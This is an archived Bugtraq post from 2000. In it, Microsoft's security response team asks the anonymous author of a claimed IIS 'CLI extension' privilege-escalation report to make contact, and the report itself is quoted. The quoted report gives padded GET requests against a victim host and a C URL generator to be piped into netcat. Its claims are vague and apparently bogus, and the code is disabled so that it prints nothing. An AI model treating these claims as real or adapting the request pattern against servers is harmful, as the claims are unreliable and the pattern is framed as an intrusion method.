[15284] in bugtraq
Re: Shinex vs. IIS CLI Extensions
daemon@ATHENA.MIT.EDU (Microsoft Security Response Center)
Sat Jun 10 02:14:17 2000
Mime-Version: 1.0
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=SHA1;
boundary="----=_NextPart_000_04A1_01BFD186.90736E10";
protocol="application/x-pkcs7-signature"
Message-Id: <D1A11CCE78ADD111A35500805FD43F5807E0B47C@RED-MSG-04>
Date: Thu, 8 Jun 2000 20:17:15 -0700
Reply-To: Microsoft Security Response Center <secure@MICROSOFT.COM>
From: Microsoft Security Response Center <secure@MICROSOFT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_04A1_01BFD186.90736E10
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
We'd be very interested in investigating this report, but
unfortunately
we can't contact the author because of the anonymous remailer. If
the
author would contact us at secure@microsoft.com, we'd very much to
get
some additional information. Regards,
Secure@microsoft.com
- -----Original Message-----
From: dev-null@NO-ID.COM [mailto:dev-null@NO-ID.COM]
Sent: Monday, June 05, 2000 5:32 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Shinex vs. IIS CLI Extensions
[ This message has been sent anonymously due to configuration
problems
I'm experiencing with my mail server. If you would like to discuss
the finepoints of this post, you're quite welcome to message me on
Efnet (nickname: shinex). ]
While doing a security audit on a WinNT 4.0 system, I discovered an
`object collision` vulnerability that can potentially lead to remote
compromise.
The flaw lies in the mechanism employed by CLI objects to handle
dynamic pre-auth requests from a stateful client. States of operation
are inherent in the implementation itself. This flaw could lead to a
determined attacker gaining administrative privileges on servers
using this widely deployed object kit.
EXPLOITATION NOTES
- ------------------
Request #1:
http://www.victim.com/.....~518 chars.../[invocation of CLI object]
Request #2:
http://www.victim.com/.....~260 chars.../[request with req1 object as
ext]
Simple as that.
It's important that both requests reach the target server within
a timeframe of 15 seconds (a rough estimate). Your threshold may
vary.
Subsequent requests will be made with raised authorization levels.
The rationale for the char padding will be available later in the
followup post (see below).
Microsoft has been notified and patching information should be
forthcoming.
While not as severe as the RDS vulnerability, it is still an avenue
of
attack
that could provide a determined attacker with unauthorized access.
(Allow me to mention in passing that the scarcity of detail in this
paper
is intentional. A more thorough assessment will be posted after
Microsoft
have released their hotfix.)
HELPER CODE
- -----------
/*
** clisweep.c by shinex (efnet)
** Quick generator for IIS4 CLI extension vuln URLs.
**
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80
** OK. This code is buggy, because I mistakingly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"
char *gendots(int);
char *calc(char *);
int main(int argc, char *argv[])
{
char req1[1024], req2[1024];
if(argc != 2)
{
fprintf(stderr, "Usage: %s <cli object>\n", *argv);
return -1;
}
sprintf(req1, "GET /%s/%s", gendots(DOT1), argv[1]);
sprintf(req2, "GET /%s/%s", gendots(DOT2), calc(argv[1]));
#ifdef SCRIPTKIDPROTECTION
printf("%s\n\n", req1);
sleep(THRESHOLD);
printf("%s\n\n", req2);
#endif
return 0;
}
char *gendots(int num)
{
int i;
static char dots[1024];
char *ptr = dots;
for(i = 0; i < num; i++)
*ptr++ = '.';
return dots;
}
char *calc(char *arg)
{
static char file[1024];
char *ptr;
ptr = strrchr(arg, '.');
*ptr = '\0'; /* no error checks */
sprintf(file, "%s.%s", RANDFILE, arg);
return file;
}
SHOUTOUTS
- ---------
Greets to route and my other friends.
- --
This message has been sent via an anonymous mail relay at
www.no-id.com.
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.3
iQEVAwUBOUBhxo0ZSRQxA/UrAQGUEwgArWqKiGuSBSKz71ui5jFmRAf0nPRm6ez6
Ly1wVNRQLIuknJmz7eS5I6mQ7+UTgaMpT90fHRN6heU7T45xdsNAHwrJ9btNPEpW
luW3q0fHMGaTEXAEm6pAvX5ORV7pWgvRV6NHBPFv5MTLNwd9xbC4mhJXpp7sdpkO
h3XDNSuOcRmHTCcBL1Ikq8R/MgogKe/+AdTGTolAr9uvwTRTEa4SMolp98jUh813
jd54uiWU7M1tu5Wi3gsiDnIske+TzijLoyx4n8G0o01BKieiOvrYbQVvUb92DTPu
EvetLz1Gavj41M9fCP2zmdUSJInRtPXhgF4DMaiL5h1Bu0zg/T8KRg==
=QG1C
-----END PGP SIGNATURE-----
------=_NextPart_000_04A1_01BFD186.90736E10
Content-Type: application/x-pkcs7-signature;
name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="smime.p7s"
MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIHvDCCAy4w
ggKXoAMCAQICEQDSdi6NFAw9fbKoJV2v7g11MA0GCSqGSIb3DQEBAgUAMF8xCzAJBgNVBAYTAlVT
MRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjE3MDUGA1UECxMuQ2xhc3MgMSBQdWJsaWMgUHJpbWFy
eSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw05ODA1MTIwMDAwMDBaFw0wODA1MTIyMzU5NTla
MIHMMRcwFQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0
d29yazFGMEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5
IFJlZi4sTElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRpdmlk
dWFsIFN1YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkMIGfMA0GCSqGSIb3DQEBAQUAA4GN
ADCBiQKBgQC7WkSKBBa7Vf0DeootlE8VeDa4DUqyb5xUv7zodyqdufBou5XZMUFweoFLuUgTVi3H
COGEQqvAopKrRFyqQvCCDgLpL/vCO7u+yScKXbawNkIztW5UiE+HSr8Z2vkV6A+HthzjzMaajn9q
JJLj/OBluqexfu/J2zdqyErICQbkmQIDAQABo3wwejARBglghkgBhvhCAQEEBAMCAQYwRwYDVR0g
BEAwPjA8BgtghkgBhvhFAQcBATAtMCsGCCsGAQUFBwIBFh93d3cudmVyaXNpZ24uY29tL3JlcG9z
aXRvcnkvUlBBMA8GA1UdEwQIMAYBAf8CAQAwCwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBAgUAA4GB
AIi4Nzvd2pQ3AK2qn+GBAXEekmptL/bxndPKZDjcG5gMB4ZbhRVqD7lJhaSV8Rd9Z7R/LSzdmkKe
wz60jqrlCwbe8lYq+jPHvhnXU0zDvcjjF7WkSUJj7MKmFw9dWBpJPJBcVaNlIAD9GCDlX4KmsaiS
xVhqwY0DPOvDzQWikK5uMIIEhjCCA++gAwIBAgIQBVujtlw0K6W7MlJ1/6zgIjANBgkqhkiG9w0B
AQQFADCBzDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZlcmlTaWduIFRydXN0
IE5ldHdvcmsxRjBEBgNVBAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9yeS9SUEEgSW5jb3Jw
LiBCeSBSZWYuLExJQUIuTFREKGMpOTgxSDBGBgNVBAMTP1ZlcmlTaWduIENsYXNzIDEgQ0EgSW5k
aXZpZHVhbCBTdWJzY3JpYmVyLVBlcnNvbmEgTm90IFZhbGlkYXRlZDAeFw05OTEyMzAwMDAwMDBa
Fw0wMDEyMjkyMzU5NTlaMIIBKjEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4xHzAdBgNVBAsTFlZl
cmlTaWduIFRydXN0IE5ldHdvcmsxRjBEBgNVBAsTPXd3dy52ZXJpc2lnbi5jb20vcmVwb3NpdG9y
eS9SUEEgSW5jb3JwLiBieSBSZWYuLExJQUIuTFREKGMpOTgxHjAcBgNVBAsTFVBlcnNvbmEgTm90
IFZhbGlkYXRlZDE0MDIGA1UECxMrRGlnaXRhbCBJRCBDbGFzcyAxIC0gTWljcm9zb2Z0IEZ1bGwg
U2VydmljZTErMCkGA1UEAxQiTWljcm9zb2Z0IFNlY3VyaXR5IFJlc3BvbnNlIENlbnRlcjEjMCEG
CSqGSIb3DQEJARYUc2VjdXJlQG1pY3Jvc29mdC5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJ
AoGBALmnytCmO48UVl/4ou0RKLf3WT/yg7DrM4g7Hqh1QwV+6V/RyVKa8qfy5tx855H/ifS5MaG8
Gcw7TM/+DrEqgPAUjNj/kM1jZWZnvAsjGm9/AOMFNIB3Dne3rSsnOzw+YHboWBsnr0Fj6uexHfGD
4dSiT4Ei9hLoZMdTObBB2icRAgMBAAGjggEGMIIBAjAJBgNVHRMEAjAAMIGsBgNVHSAEgaQwgaEw
gZ4GC2CGSAGG+EUBBwEBMIGOMCgGCCsGAQUFBwIBFhxodHRwczovL3d3dy52ZXJpc2lnbi5jb20v
Q1BTMGIGCCsGAQUFBwICMFYwFRYOVmVyaVNpZ24sIEluYy4wAwIBARo9VmVyaVNpZ24ncyBDUFMg
aW5jb3JwLiBieSByZWZlcmVuY2UgbGlhYi4gbHRkLiAoYyk5NyBWZXJpU2lnbjARBglghkgBhvhC
AQEEBAMCB4AwMwYDVR0fBCwwKjAooCagJIYiaHR0cDovL2NybC52ZXJpc2lnbi5jb20vY2xhc3Mx
LmNybDANBgkqhkiG9w0BAQQFAAOBgQA5n5AyLxILokAbiP2F1k9tm0c8+wnSjyDuDbI3ogEZxCSK
7FK24f5B9i/U/r+jXi6feCTUIQWY2+PZr153UCHutuEz6N2GxLjN1m8h69TsBDN9jpkU1+Lp95CW
x5eC8oPSRIi+HLD2xS7i++6Bg3jC2JglEUcMJQqbgvb4KzalezGCA1YwggNSAgEBMIHhMIHMMRcw
FQYDVQQKEw5WZXJpU2lnbiwgSW5jLjEfMB0GA1UECxMWVmVyaVNpZ24gVHJ1c3QgTmV0d29yazFG
MEQGA1UECxM9d3d3LnZlcmlzaWduLmNvbS9yZXBvc2l0b3J5L1JQQSBJbmNvcnAuIEJ5IFJlZi4s
TElBQi5MVEQoYyk5ODFIMEYGA1UEAxM/VmVyaVNpZ24gQ2xhc3MgMSBDQSBJbmRpdmlkdWFsIFN1
YnNjcmliZXItUGVyc29uYSBOb3QgVmFsaWRhdGVkAhAFW6O2XDQrpbsyUnX/rOAiMAkGBSsOAwIa
BQCgggHKMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAwMDYwOTAz
MTcyNlowIwYJKoZIhvcNAQkEMRYEFNpB7AzVvnpU9EVdzUTl4/uJM7BJMHYGCSqGSIb3DQEJDzFp
MGcwCgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMAcGBSsOAwIHMAcGBSsOAwIHMA0GCCqGSIb3
DQMCAgEoMAcGBSsOAwIaMAcGBSsOAwIaMAoGCCqGSIb3DQIFMAoGCCqGSIb3DQIFMIHyBgkrBgEE
AYI3EAQxgeQwgeEwgcwxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2ln
biBUcnVzdCBOZXR3b3JrMUYwRAYDVQQLEz13d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvUlBB
IEluY29ycC4gQnkgUmVmLixMSUFCLkxURChjKTk4MUgwRgYDVQQDEz9WZXJpU2lnbiBDbGFzcyAx
IENBIEluZGl2aWR1YWwgU3Vic2NyaWJlci1QZXJzb25hIE5vdCBWYWxpZGF0ZWQCEAVbo7ZcNCul
uzJSdf+s4CIwDQYJKoZIhvcNAQEBBQAEgYC3DOcvfFjbFXckwar3D2/FlFqksn2iXGMMOzRp3F59
cRkyG7W1vC5OpfgcvhxKoZ+xc/x24Oi/eHuq2a+wGBPv5DQIRr+6fB+TkeVXouecCmNvX5qYe1Ca
mdqLNlTdLrLCwY/voBP1w1qRDCIyuB/20WyBs6iPlMDd4dp6wTloBQAAAAAAAA==
------=_NextPart_000_04A1_01BFD186.90736E10--
